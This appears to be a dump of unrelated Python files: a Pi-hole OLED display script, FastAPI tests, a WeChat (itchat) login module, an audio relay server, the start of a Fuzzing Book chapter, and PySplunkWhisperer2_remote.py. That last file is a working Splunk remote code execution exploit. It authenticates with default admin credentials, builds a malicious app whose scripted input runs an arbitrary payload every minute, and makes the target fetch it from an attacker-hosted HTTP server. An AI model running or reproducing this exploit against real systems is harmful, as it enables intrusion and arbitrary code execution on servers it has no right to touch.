font1 = load_font('PixelOperator.ttf', 12)
font2 = load_font('PixelOperator.ttf', 10)
font3 = load_font('PixelOperator.ttf', 10)
font4 = load_font('PixelOperator.ttf', 10)
font = load_font('PixelOperator.ttf', 10)
clockbold = load_font('DSG.ttf', 30)
datebold = load_font('DSG.ttf', 30)
dispcounter = 1
FirstStart = 1
hostname = platform.node()
loopcount = 0
disp.clear()
disp2.clear()
def ClockDisplayL():
draw.rectangle((0, 0, 128, 64), outline=0, fill=0)
draw.text((4, 22), time.strftime("%H:%M:%S"), font=clockbold, fill=1)
disp.display(image)
time.sleep(-time.time() % 60)
def ClockDisplayR():
draw.rectangle((0, 0, 128, 64), outline=0, fill=0)
draw.text((4, 22), time.strftime("%d-%m-%Y"), font=datebold, fill=1)
disp2.display(image)
time.sleep(-time.time() % 60)
def LS1():
#1st Screen CPU/RAM/Uptime..
addr = psutil.net_if_addrs()[interface][0]
draw.text((0, 0), "Pi-hole %s" % addr.address.rjust(15), font=font, fill=255)
uptime = datetime.now() - datetime.fromtimestamp(psutil.boot_time())
draw.text((0, 12), "Up: %s" % humanize.naturaltime(uptime), font=font, fill=255)
draw.text((0, 22), " %.1f %.1f %.1f" % os.getloadavg(), font=font, fill=255)
cpu = int(psutil.cpu_percent(percpu=False))
draw.text((0, 34), "CPU", font=font, fill=255)
draw.rectangle((26, 34, 126, 34 + 6), outline=255, fill=0)
draw.rectangle((26, 34, 26 + cpu, 34 + 6), outline=255, fill=255)
mem = int(psutil.virtual_memory().percent)
draw.text((0, 44), "RAM", font=font, fill=255)
draw.rectangle((26, 44, 126, 44 + 6), outline=255, fill=0)
draw.rectangle((26, 44, 26 + mem, 44 + 6), outline=255, fill=255)
disk = int(psutil.disk_usage(mount_point).percent)
draw.text((0, 54), "Disk", font=font, fill=255)
draw.rectangle((26, 54, 126, 54 + 6), outline=255, fill=0)
draw.rectangle((26, 54, 26 + disk, 54 + 6), outline=255, fill=255 )
disp.display(image)
def LS2():
#2nd Screen PiHole Infos...
req = requests.get('http://pi.hole/admin/api.php')
data = req.json()
draw.text((0, 0), "Pi-hole (%s)" % data["status"], font=font, fill=255)
draw.line((0, 12, width, 12), fill=255)
draw.text((0, 22), "Blocked: %d (%d%%)" % (data["ads_blocked_today"], data["ads_percentage_today"]), font=font, fill=255)
draw.text((0, 32), "Queries: %d" % data["dns_queries_today"], font=font, fill=255)
draw.line((0, 50, width, 50), fill=255)
draw.text((0, 54), "Blocklist: %d" % data["domains_being_blocked"], font=font, fill=255)
disp.display(image)
def RS1():
#1st Fritzbox screen (uptime, up-/download)
fbuptime = fs.str_uptime
fbspeed = fs.str_max_bit_rate
draw.text((0, 0), "Fritz.Box infos: ", font=datebold, fill=255)
draw.line((0, 10, width, 10), fill=255)
draw.text((0, 14), "Uptime: ", font=font, fill=255)
draw.text((64, 14), fbuptime, font=font, fill=255)
draw.text((0,26), "Upload-Speed: ", font=font, fill=255)
draw.text((50,36), fbspeed[0], font=font, fill=255)
draw.text((0,46), "Download-Speed: ", font=font, fill=255)
draw.text((50,56), fbspeed[1], font=font, fill=255)
disp2.display(image)
def RS2():
#2nd Fritzbox screen
#hosts = fh.host_numbers()
#ssid = fw.ssid
#missedcalls = fc.get_missed_calls(update=True, num=10, days=7)
draw.text((0, 0), "Fritz.Box infos: ", font=font1, fill=255)
draw.line((0, 10, width, 10), fill=255)
draw.text((0, 14), "SSID: ", font=font3, fill=255)
draw.text((64, 14), "ssid", font=font2, fill=255)
draw.text((0,26), "Hosts: ", font=font3, fill=255)
draw.text((50,36), "hosts", font=font4, fill=255)
draw.text((0,46), "missed calls: ", font=font, fill=255)
draw.text((50,56), "missedcalls", font=font, fill=255)
disp2.display(image)
def LeftLogo():
show_logoleft("Pi-.bmp", disp)
def RightLogo():
show_logoright("Hole.bmp", disp2)
def LeftGif():
#Gifscreen for left display
regulator = framerate_regulator(fps=10)
left_path = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res', '04L.gif'))
left = Image.open(left_path)
size = [128, 64]
posn = (0, 0)
while True:
for frame in ImageSequence.Iterator(left):
with regulator:
background = Image.new("RGB", disp.size, "white")
background.paste(frame.resize(size, resample=Image.LANCZOS), posn)
disp.display(background.convert("1"))
def RightGif():
#Gifscreen for right display
regulator2 = framerate_regulator(fps=10)
right_path = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res', '04R.gif'))
right = Image.open(right_path)
size = [128, 64]
posn = (0, 0)
while True:
for frame in ImageSequence.Iterator(right):
with regulator2:
background = Image.new("RGB", disp.size, "white")
background.paste(frame.resize(size, resample=Image.LANCZOS), posn)
disp2.display(background.convert("1"))
while True:
if loopcount >= 10 or UPTag != "0":
print('1.1 loop:', UPTag, dispcounter, loopcount)#tester
p7 = Process(target = CheckIfUp)
p7.start()
time.sleep(2.0)
f = open("UPTag.txt", "r")
UPTag = f.read()
f.close()
p7.kill()
if UPTag != "0":
time.sleep(30.0)
print('1.4 loop:', UPTag, dispcounter, loopcount)#tester
if UPTag == "0":
loopcount = 0
print('1.5 loop:', UPTag, dispcounter, loopcount)#tester
elif loopcount <= 10 and dispcounter == 1: #and UPTag == "0":
print('2.1 loop:', UPTag, dispcounter, loopcount)#tester
p5 = Process(target = LeftLogo)
p6 = Process(target = RightLogo)
p5.start()
p6.start()
time.sleep(5.0)
p5.kill()
p6.kill()
dispcounter += 1
elif dispcounter == 2: #and UPTag == "0":
print('2.2 loop:', UPTag, dispcounter, loopcount)#tester
p1 = Process(target = LS1)
p2 = Process(target = RS1)
p1.start()
p2.start()
time.sleep(5.0)
p1.kill()
p2.kill()
dispcounter += 1
elif dispcounter == 3: #and UPTag == "0":
#print('2.3 loop:', UPTag, dispcounter, loopcount)#tester
p5 = Process(target = LeftGif)
p6 = Process(target = RightGif)
p5.start()
p6.start()
time.sleep(14.4)
p5.kill()
p6.kill()
dispcounter += 1
elif dispcounter == 4: #and UPTag == "0":
#print('2.4 loop:', UPTag, dispcounter, loopcount)#tester
p3 = Process(target = LS2)
p4 = Process(target = RS2)
p3.start()
p4.start()
time.sleep(5.0)
p3.kill()
p4.kill()
dispcounter += 1
elif dispcounter == 5: #and UPTag == "0":
print('2.5 loop:', UPTag, dispcounter, loopcount)#tester
p8 = Process(target = ClockDisplayL)
p9 = Process(target = ClockDisplayR)
p8.start()
p9.start()
time.sleep(5.0)
p8.kill()
p9.kill()
dispcounter -= 3
loopcount += 1
print('end:', UPTag, dispcounter, loopcount)#tester
|
test_responses.py
|
# -*- coding: utf-8 -*-
import multiprocessing
import os
from unittest import TestCase
import uvicorn
from fastapi import FastAPI
from fastapi.testclient import TestClient
from projects.api.main import app, parse_args
from projects.controllers.utils import uuid_alpha
from projects.database import engine
TEST_CLIENT = TestClient(app)
PROJECT_ID = str(uuid_alpha())
DEPLOYMENT_ID = str(uuid_alpha())
EXPERIMENT_ID = None
NAME = "foo"
CREATED_AT = "2000-01-01 00:00:00"
UPDATED_AT = "2000-01-01 00:00:00"
DESCRIPTION = "Description"
POSITION = 0
class TestResponses(TestCase):
def setUp(self):
os.environ["BROKER_URL"] = "http://localhost:8000"
app = FastAPI()
@app.post("/")
async def root():
return {}
self.proc = multiprocessing.Process(target=uvicorn.run, args=(app,))
self.proc.start()
conn = engine.connect()
text = (
f"INSERT INTO projects (uuid, name, description, created_at, updated_at) "
f"VALUES (%s, %s, %s, %s, %s)"
)
conn.execute(text, (PROJECT_ID, NAME, DESCRIPTION, CREATED_AT, UPDATED_AT,))
text = (
f"INSERT INTO deployments (uuid, name, project_id, experiment_id, position, is_active, created_at, updated_at) "
f"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
)
conn.execute(text, (DEPLOYMENT_ID, NAME, PROJECT_ID, EXPERIMENT_ID, POSITION, 1, CREATED_AT, UPDATED_AT,))
conn.close()
def tearDown(self):
self.proc.terminate()
conn = engine.connect()
text = f"DELETE FROM deployments WHERE project_id = '{PROJECT_ID}'"
conn.execute(text)
text = f"DELETE FROM projects WHERE uuid = '{PROJECT_ID}'"
conn.execute(text)
conn.close()
def test_parse_args(self):
parser = parse_args([])
self.assertEqual(parser.port, 8080)
self.assertFalse(parser.enable_cors)
def test_post(self):
rv = TEST_CLIENT.post(f"/projects/{PROJECT_ID}/deployments/{DEPLOYMENT_ID}/responses", json={
"data": {
"ndarray": [
[1, 2, "a"]
]
}
})
result = rv.text
expected = "{\"message\":\"OK\"}"
self.assertEqual(result, expected)
self.assertEqual(rv.status_code, 200)
rv = TEST_CLIENT.post(f"/projects/{PROJECT_ID}/deployments/{DEPLOYMENT_ID}/responses", json={
"strData": "texto"
})
result = rv.text
expected = "{\"message\":\"OK\"}"
self.assertEqual(result, expected)
self.assertEqual(rv.status_code, 200)
rv = TEST_CLIENT.post(f"/projects/{PROJECT_ID}/deployments/{DEPLOYMENT_ID}/responses", json={
"binData": "Cg=="
})
result = rv.text
expected = "{\"message\":\"OK\"}"
self.assertEqual(result, expected)
self.assertEqual(rv.status_code, 200)
|
login.py
|
import os, time, re, io
import threading
import json, xml.dom.minidom
import random
import traceback, logging
try:
from httplib import BadStatusLine
except ImportError:
from http.client import BadStatusLine
import requests
from pyqrcode import QRCode
from .. import config, utils
from ..returnvalues import ReturnValue
from ..storage.templates import wrap_user_dict
from .contact import update_local_chatrooms, update_local_friends
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive or self.isLogging:
logger.warning('itchat has already logged in.')
return
self.isLogging = True
while self.isLogging:
uuid = push_login(self)
if uuid:
qrStorage = io.BytesIO()
else:
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid():
time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn:
break
elif self.isLogging:
logger.info('Log in time out, reloading QR code.')
else:
return # log in process is stopped by user
logger.info('Loading the contact, this may take a little while.')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Login successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
self.isLogging = False
def push_login(core):
cookiesDict = core.s.cookies.get_dict()
if 'wxuin' in cookiesDict:
url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % (
config.BASE_URL, cookiesDict['wxuin'])
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(url, headers=headers).json()
if 'uuid' in r and r.get('ret') in (0, '0'):
core.uuid = r['uuid']
return r['uuid']
return False
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
qrStorage = io.BytesIO()
qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid)
qrCode.png(qrStorage, scale=10)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
with open(picDir, 'wb') as f:
f.write(qrStorage.getvalue())
if enableCmdQR:
utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR)
else:
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=1&r=%s&_=%s' % (
uuid, int(-localTime / 1579), localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
if process_login_info(self, r.text):
return '200'
else:
return '400'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['logintime'] = int(time.time() * 1e3)
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]):
logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text)
core.isLogging = False
return False
return True
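# Added note: after process_login_info() succeeds, core.loginInfo contains
# 'url', 'fileUrl', 'syncUrl', 'deviceid', 'logintime', 'skey', 'wxsid',
# 'wxuin', 'pass_ticket' and a 'BaseRequest' dict ('Skey', 'Sid', 'Uin',
# 'DeviceID'); these values are consumed below by web_init(), sync_check()
# and get_msg().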
def web_init(self):
url = '%s/webwxinit' % self.loginInfo['url']
params = {
'r': int(-time.time() / 1579),
'pass_ticket': self.loginInfo['pass_ticket'], }
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, params=params, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User']))
self.memberList.append(self.loginInfo['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
# deal with contact list returned when init
contactList = dic.get('ContactList', [])
chatroomList, otherList = [], []
for m in contactList:
if m['Sex'] != 0:
otherList.append(m)
elif '@@' in m['UserName']:
m['MemberList'] = [] # don't let dirty info pollute the list
chatroomList.append(m)
elif '@' in m['UserName']:
# mp will be dealt in update_local_friends as well
otherList.append(m)
if chatroomList:
update_local_chatrooms(self, chatroomList)
if otherList:
update_local_friends(self, otherList)
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
pass
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList:
self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
chatroomMsg['User'] = self.loginInfo['User']
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except requests.exceptions.ReadTimeout:
pass
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : self.loginInfo['logintime'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.loginInfo['logintime'] += 1
try:
r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT)
except requests.exceptions.ConnectionError as e:
try:
if not isinstance(e.args[0].args[1], BadStatusLine):
raise
# will return a package with status '0 -'
# and value like:
# 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93
            # seems to indicate typing status; until this is better understood the code stays as-is
return '2'
except:
raise
r.raise_for_status()
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.isLogging = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
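# Added flow summary for the login component above: login() loops over
# get_QRuuid()/get_QR()/check_login() until the QR scan returns '200', then
# runs web_init(), show_mobile_login(), get_contact() and start_receiving();
# start_receiving() polls sync_check()/get_msg() from a daemon thread and
# calls logout() once the sync loop ends or the retry count is exhausted.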
|
PySplunkWhisperer2_remote.py
|
import sys, os, tempfile, shutil
import tarfile
import requests
import SocketServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import argparse
import threading
requests.packages.urllib3.disable_warnings(category=requests.packages.urllib3.exceptions.InsecureRequestWarning)
SPLUNK_APP_NAME = '_PWN_APP_'
def create_splunk_bundle(options):
tmp_path = tempfile.mkdtemp()
os.mkdir(os.path.join(tmp_path, SPLUNK_APP_NAME))
bin_dir = os.path.join(tmp_path, SPLUNK_APP_NAME, "bin")
os.mkdir(bin_dir)
pwn_file = os.path.join(bin_dir, options.payload_file)
open(pwn_file, "w").write(options.payload)
# make the script executable - not 100% certain this makes a difference
os.chmod(pwn_file, 0o700)
local_dir = os.path.join(tmp_path, SPLUNK_APP_NAME, "local")
os.mkdir(local_dir)
inputs_conf = os.path.join(local_dir, "inputs.conf")
with open(inputs_conf, "w") as f:
inputs = '[script://$SPLUNK_HOME/etc/apps/{}/bin/{}]\n'.format(SPLUNK_APP_NAME, options.payload_file)
inputs += 'disabled = false\n'
inputs += 'index = default\n'
inputs += 'interval = 60.0\n'
inputs += 'sourcetype = test\n'
f.write(inputs)
(fd, tmp_bundle) = tempfile.mkstemp(suffix='.tar')
os.close(fd)
with tarfile.TarFile(tmp_bundle, mode="w") as tf:
tf.add(os.path.join(tmp_path, SPLUNK_APP_NAME), arcname=SPLUNK_APP_NAME)
shutil.rmtree(tmp_path)
return tmp_bundle
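# Added note -- bundle layout produced by create_splunk_bundle() above:
#   _PWN_APP_/
#       bin/<payload_file>    payload written from --payload, chmod 0700
#       local/inputs.conf     scripted input that runs the payload every 60s
# The tree is packed into a temporary .tar file whose path is returned.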
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self):
global BUNDLE_FILE
bundle = open(BUNDLE_FILE, 'rb').read()
self.send_response(200)
self.send_header('Expires', 'Thu, 26 Oct 1978 00:00:00 GMT')
self.send_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
self.send_header('Content-type', 'application/tar')
self.send_header('Content-Disposition', 'attachment; filename="splunk_bundle.tar"')
self.send_header('Content-Length', len(bundle))
self.end_headers()
self.wfile.write(bundle)
class ThreadedHTTPServer(object):
"""Runs SimpleHTTPServer in a thread
Lets you start and stop an instance of SimpleHTTPServer.
"""
def __init__(self, host, port, request_handler=SimpleHTTPRequestHandler):
"""Prepare thread and socket server
Creates the socket server that will use the HTTP request handler. Also
prepares the thread to run the serve_forever method of the socket
server as a daemon once it is started
"""
SocketServer.TCPServer.allow_reuse_address = True
self.server = SocketServer.TCPServer((host, port), request_handler)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
"""Stop the HTTP server
Stops the server and cleans up the port assigned to the socket
"""
self.server.shutdown()
self.server.server_close()
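# Usage sketch for ThreadedHTTPServer (illustrative comment only; mirrors how
# the script uses it further down): serving starts from a daemon thread as
# soon as the object is constructed.
#   httpd = ThreadedHTTPServer('0.0.0.0', 8181, request_handler=CustomHandler)
#   ...                      # let the target fetch the served bundle
#   httpd.stop()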
parser = argparse.ArgumentParser()
parser.add_argument('--scheme', default="https")
parser.add_argument('--host', default="localhost")
parser.add_argument('--port', default=8089)
parser.add_argument('--lhost', required=True)
parser.add_argument('--lport', default=8181)
parser.add_argument('--username', default="admin")
parser.add_argument('--password', default="changeme")
parser.add_argument('--payload', default="calc.exe")
parser.add_argument('--payload-file', default="pwn.bat")
options = parser.parse_args()
print "Running in remote mode (Remote Code Execution)"
SPLUNK_BASE_API = "{}://{}:{}/services/apps/local/".format(options.scheme, options.host, options.port, )
s = requests.Session()
s.auth = requests.auth.HTTPBasicAuth(options.username, options.password)
s.verify = False
print "[.] Authenticating..."
req = s.get(SPLUNK_BASE_API)
if req.status_code == 401:
print "Authentication failure"
print ""
print req.text
sys.exit(-1)
print "[+] Authenticated"
print "[.] Creating malicious app bundle..."
BUNDLE_FILE = create_splunk_bundle(options)
print "[+] Created malicious app bundle in: " + BUNDLE_FILE
httpd = ThreadedHTTPServer(options.lhost, options.lport, request_handler=CustomHandler)
print "[+] Started HTTP server for remote mode"
lurl = "http://{}:{}/".format(options.lhost, options.lport)
print "[.] Installing app from: " + lurl
req = s.post(SPLUNK_BASE_API, data={'name': lurl, 'filename': True, 'update': True})
if req.status_code != 200 and req.status_code != 201:
print "Got a problem: " + str(req.status_code)
print ""
print req.text
print "[+] App installed, your code should be running now!"
print "\nPress RETURN to cleanup"
raw_input()
os.remove(BUNDLE_FILE)
print "[.] Removing app..."
req = s.delete(SPLUNK_BASE_API + SPLUNK_APP_NAME)
if req.status_code != 200 and req.status_code != 201:
print "Got a problem: " + str(req.status_code)
print ""
print req.text
print "[+] App removed"
httpd.stop()
print "[+] Stopped HTTP server"
print "Bye!"
|
serverAudio.py
|
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
HOST = input("Enter Host IP\n")
PORT = 4000
BufferSize = 4096
addresses = {}
def Connections():
while True:
try:
client, addr = server.accept()
print("{} is connected!!".format(addr))
addresses[client] = addr
Thread(target=ClientConnectionSound, args=(client, )).start()
except:
continue
def ClientConnectionSound(client):
while True:
try:
data = client.recv(BufferSize)
broadcastSound(client, data)
except:
continue
def broadcastSound(clientSocket, data_to_be_sent):
for client in addresses:
if client != clientSocket:
client.sendall(data_to_be_sent)
server = socket(family=AF_INET, type=SOCK_STREAM)
try:
server.bind((HOST, PORT))
except OSError:
    print("Server Busy")
    raise
server.listen(2)
print("Waiting for connection..")
AcceptThread = Thread(target=Connections)
AcceptThread.start()
AcceptThread.join()
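# Added note: this server only relays raw bytes. A matching client (not shown
# here) would connect to (HOST, PORT), keep sending captured audio chunks of at
# most BufferSize bytes, and play back whatever it receives; broadcastSound()
# forwards every chunk unchanged to all other connected clients.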
|
FuzzingInTheLarge.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Fuzzing in the Large" - a chapter of "The Fuzzing Book"
# Web site: https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
# Last change: 2021-11-03 13:27:49+01:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Fuzzing Book - Fuzzing in the Large
This file can be _executed_ as a script, running all experiments:
$ python FuzzingInTheLarge.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from fuzzingbook.FuzzingInTheLarge import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
The Python `FuzzManager` package allows for programmatic submission of failures from a large number of (fuzzed) programs. One can query crashes and their details, collect them into buckets to ensure they will be treated the same, and also retrieve coverage information for debugging both programs and their tests.
For more details, source, and documentation, see
"The Fuzzing Book - Fuzzing in the Large"
at https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'fuzzingbook'
# Fuzzing in the Large
# ====================
if __name__ == '__main__':
print('# Fuzzing in the Large')
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
from . import Fuzzer
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Collecting Crashes from Multiple Fuzzers
## ----------------------------------------
if __name__ == '__main__':
print('\n## Collecting Crashes from Multiple Fuzzers')
from graphviz import Digraph
if __name__ == '__main__':
g = Digraph()
server = 'Crash Server'
g.node('Crash Database', shape='cylinder')
for i in range(1, 7):
g.edge('Fuzzer ' + repr(i), server)
g.edge(server, 'Crash Database')
g
## Running a Crash Server
## ----------------------
if __name__ == '__main__':
print('\n## Running a Crash Server')
### Excursion: Setting up the Server
if __name__ == '__main__':
print('\n### Excursion: Setting up the Server')
import os
import sys
